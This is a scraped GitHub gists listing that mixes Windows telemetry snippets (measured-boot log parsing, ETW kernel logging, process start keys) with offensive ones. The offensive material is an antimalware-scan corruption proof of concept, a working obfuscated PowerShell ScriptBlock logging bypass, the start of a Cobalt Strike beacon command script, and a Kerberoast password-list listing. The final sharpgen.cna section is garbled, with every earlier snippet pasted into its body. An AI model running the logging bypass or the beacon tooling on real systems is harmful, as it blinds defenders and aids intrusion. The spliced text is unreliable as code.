CaledoniaProject

## TI-Search-Shortcuts.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                CaledoniaProject
                / TI-Search-Shortcuts.md
            
            
              Created
              March 25, 2019 14:06
                — forked from Neo23x0/TI-Search-Shortcuts.md
            
              
                Search Engine Shortcuts
              
          
    Search Engine Shortcuts

Use Manage Search Engines in your browser to add these search engines.
You can then use the 'keyword' in the URL bar to do a quick lookup. Find more details about managing your search engines in Chrome here.
e.g.
Type
v dad8ebcbb5fa6721ccad45b81874e22c


## SimpleTCGLogParser.ps1
Import-Module HgsDiagnostics
$GetHgsTrace = Get-Command Get-HgsTrace
$RemoteAttestationCoreReference = $GetHgsTrace.ImplementingType.Assembly.GetReferencedAssemblies() | Where-Object { $_.Name -eq 'Microsoft.Windows.RemoteAttestation.Core' }
Add-Type -AssemblyName $RemoteAttestationCoreReference.FullName

$MostRecentTCGLog = Get-ChildItem C:\Windows\Logs\MeasuredBoot | Sort-Object -Property LastWriteTime -Descending | Select-Object -First 1 | Select-Object -ExpandProperty FullName
$LogBytes = [IO.File]::ReadAllBytes($MostRecentTCGLog)

$ParsedTCGLog = [Microsoft.Windows.RemoteAttestation.Core.TcgEventLog]::Parse($LogBytes)
$ParsedTCGLog.TcgData.Children | Sort-Object -Property PcrIndex | Group-Object -Property PcrIndex

## PSProcmon.psm1
# These keyword values can be obtained with: logman query providers Microsoft-Windows-Kernel-Registry
[Flags()]
enum RegistryOptions {
    CloseKey              = 0x00000001
    QuerySecurityKey      = 0x00000002
    SetSecurityKey        = 0x00000004
    EnumerateValueKey     = 0x00000010
    QueryMultipleValueKey = 0x00000020
    SetInformationKey     = 0x00000040
    FlushKey              = 0x00000080

## process_image_logging.ps1
# These values were obtained from: logman query providers Microsoft-Windows-Kernel-Process
$WINEVENT_KEYWORD_PROCESS = 0x10
$WINEVENT_KEYWORD_IMAGE   = 0x40

# Normally when you enable an analytic log, all keywords are logged which can be veeeeerrrrryy noisy.
# I'm going to limit collection to only image and process event
$KernelProcessLog = New-Object -TypeName System.Diagnostics.Eventing.Reader.EventLogConfiguration -ArgumentList 'Microsoft-Windows-Kernel-Process/Analytic'
$KernelProcessLog.ProviderKeywords = ($WINEVENT_KEYWORD_PROCESS -bor $WINEVENT_KEYWORD_IMAGE)
$KernelProcessLog.ProviderLevel = 0xFF
$KernelProcessLog.IsEnabled = $true

## GetProcessStartKey.ps1
function Get-ProcessStartKey {
<#
.SYNOPSIS

Derives the process start key for one or more processes.

.DESCRIPTION

Get-ProcessStartKey derives the process start key for one or more processes. Process start keys were introduced in Win 10 1507 and are intended to serve as a locally unique identifier for a process. A process ID cannot be considered a unique identifier since process IDs are repeatable.

## CorruptCLRGlobal.ps1
function Subvert-CLRAntiMalware {
<#
.SYNOPSIS

A proof-of-concept demonstrating overwriting a global variable that stores a pointer to an antimalware scan interface context structure. This PoC was only built to work with .NET Framework Early Access build 3694.

.DESCRIPTION

clr.dll in .NET Framework Early Access build 3694 has a global variable that stores a pointer to an antimalware scan interface context structure. By reading the pointer at that offset and then overwriting the forst DWORD, the context structure will become corrupted and subsequent scanning calls will fail open.

## ScriptBlockLogBypass.ps1
# ScriptBlock Logging Bypass
# @cobbr_io

$GroupPolicyField = [ref].Assembly.GetType('System.Management.Automation.Utils')."GetFie`ld"('cachedGroupPolicySettings', 'N'+'onPublic,Static')
If ($GroupPolicyField) {
    $GroupPolicyCache = $GroupPolicyField.GetValue($null)
    If ($GroupPolicyCache['ScriptB'+'lockLogging']) {
        $GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0
        $GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0
    }

## kerberoast_pws.xz

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                CaledoniaProject
                / kerberoast_pws.xz
            
            
              Last active
              November 14, 2018 05:11
                — forked from edermi/kerberoast_pws.xz
            
              
                edermi Kerberoast PW list (XZ format)
              
          
      This file has been truncated, but you can view the full file.
    

            View raw
        
    
## doh_test.sh
#!/bin/bash
printf "===START dns.google.com===\n"
curl -k -H "accept: application/dns-json" "https://dns.google.com/resolve?name=example.com&type=AAAA"
printf "\n===END dns.google.com===\n"
printf "===START cloudflare-dns.com===\n"
curl -k -H "accept: application/dns-json" "https://cloudflare-dns.com/dns-query?name=example.com&type=AAAA"
printf "\n===END cloudflare-dns.com===\n"
printf "===START 1.1.1.1===\n"
curl -k -H "accept: application/dns-json" "https://1.1.1.1/dns-query?name=example.com&type=AAAA"
printf "\n===END 1.1.1.1===\n"

## sharpgen.cna
$dotnetpath = "/usr/local/share/dotnet/dotnet";
$sharpgenpath = "/Users/dtmsecurity/Tools/SharpGen/bin/Debug/netcoreapp2.1/SharpGen.dll";
$temppath = "/tmp/";

beacon_command_register("sharpgen", "Compile and execute C-Sharp","Synopsis: sharpgen [code]\n");

alias sharpgen{
	$executionId  = "sharpgen_" . int(rand() * 100000);
	$temporaryCsharp =  $temppath . $executionId . ".cs";
	$executableFilename = $temppath . $executionId . ".exe";
	Import-Module HgsDiagnostics
	$GetHgsTrace = Get-Command Get-HgsTrace
	$RemoteAttestationCoreReference = $GetHgsTrace.ImplementingType.Assembly.GetReferencedAssemblies() \| Where-Object { $_.Name -eq 'Microsoft.Windows.RemoteAttestation.Core' }
	Add-Type -AssemblyName $RemoteAttestationCoreReference.FullName

	$MostRecentTCGLog = Get-ChildItem C:\Windows\Logs\MeasuredBoot \| Sort-Object -Property LastWriteTime -Descending \| Select-Object -First 1 \| Select-Object -ExpandProperty FullName
	$LogBytes = [IO.File]::ReadAllBytes($MostRecentTCGLog)

	$ParsedTCGLog = [Microsoft.Windows.RemoteAttestation.Core.TcgEventLog]::Parse($LogBytes)
	$ParsedTCGLog.TcgData.Children \| Sort-Object -Property PcrIndex \| Group-Object -Property PcrIndex
	# These keyword values can be obtained with: logman query providers Microsoft-Windows-Kernel-Registry
	[Flags()]
	enum RegistryOptions {
	CloseKey = 0x00000001
	QuerySecurityKey = 0x00000002
	SetSecurityKey = 0x00000004
	EnumerateValueKey = 0x00000010
	QueryMultipleValueKey = 0x00000020
	SetInformationKey = 0x00000040
	FlushKey = 0x00000080
	# These values were obtained from: logman query providers Microsoft-Windows-Kernel-Process
	$WINEVENT_KEYWORD_PROCESS = 0x10
	$WINEVENT_KEYWORD_IMAGE = 0x40

	# Normally when you enable an analytic log, all keywords are logged which can be veeeeerrrrryy noisy.
	# I'm going to limit collection to only image and process event
	$KernelProcessLog = New-Object -TypeName System.Diagnostics.Eventing.Reader.EventLogConfiguration -ArgumentList 'Microsoft-Windows-Kernel-Process/Analytic'
	$KernelProcessLog.ProviderKeywords = ($WINEVENT_KEYWORD_PROCESS -bor $WINEVENT_KEYWORD_IMAGE)
	$KernelProcessLog.ProviderLevel = 0xFF
	$KernelProcessLog.IsEnabled = $true
	function Get-ProcessStartKey {
	<#
	.SYNOPSIS

	Derives the process start key for one or more processes.

	.DESCRIPTION

	Get-ProcessStartKey derives the process start key for one or more processes. Process start keys were introduced in Win 10 1507 and are intended to serve as a locally unique identifier for a process. A process ID cannot be considered a unique identifier since process IDs are repeatable.
	function Subvert-CLRAntiMalware {
	<#
	.SYNOPSIS

	A proof-of-concept demonstrating overwriting a global variable that stores a pointer to an antimalware scan interface context structure. This PoC was only built to work with .NET Framework Early Access build 3694.

	.DESCRIPTION

	clr.dll in .NET Framework Early Access build 3694 has a global variable that stores a pointer to an antimalware scan interface context structure. By reading the pointer at that offset and then overwriting the forst DWORD, the context structure will become corrupted and subsequent scanning calls will fail open.
	# ScriptBlock Logging Bypass
	# @cobbr_io

	$GroupPolicyField = [ref].Assembly.GetType('System.Management.Automation.Utils')."GetFie`ld"('cachedGroupPolicySettings', 'N'+'onPublic,Static')
	If ($GroupPolicyField) {
	$GroupPolicyCache = $GroupPolicyField.GetValue($null)
	If ($GroupPolicyCache['ScriptB'+'lockLogging']) {
	$GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0
	$GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0
	}
	#!/bin/bash
	printf "===START dns.google.com===\n"
	curl -k -H "accept: application/dns-json" "https://dns.google.com/resolve?name=example.com&type=AAAA"
	printf "\n===END dns.google.com===\n"
	printf "===START cloudflare-dns.com===\n"
	curl -k -H "accept: application/dns-json" "https://cloudflare-dns.com/dns-query?name=example.com&type=AAAA"
	printf "\n===END cloudflare-dns.com===\n"
	printf "===START 1.1.1.1===\n"
	curl -k -H "accept: application/dns-json" "https://1.1.1.1/dns-query?name=example.com&type=AAAA"
	printf "\n===END 1.1.1.1===\n"
	$dotnetpath = "/usr/local/share/dotnet/dotnet";
	$sharpgenpath = "/Users/dtmsecurity/Tools/SharpGen/bin/Debug/netcoreapp2.1/SharpGen.dll";
	$temppath = "/tmp/";

	beacon_command_register("sharpgen", "Compile and execute C-Sharp","Synopsis: sharpgen [code]\n");

	alias sharpgen{
	$executionId = "sharpgen_" . int(rand() * 100000);
	$temporaryCsharp = $temppath . $executionId . ".cs";
	$executableFilename = $temppath . $executionId . ".exe";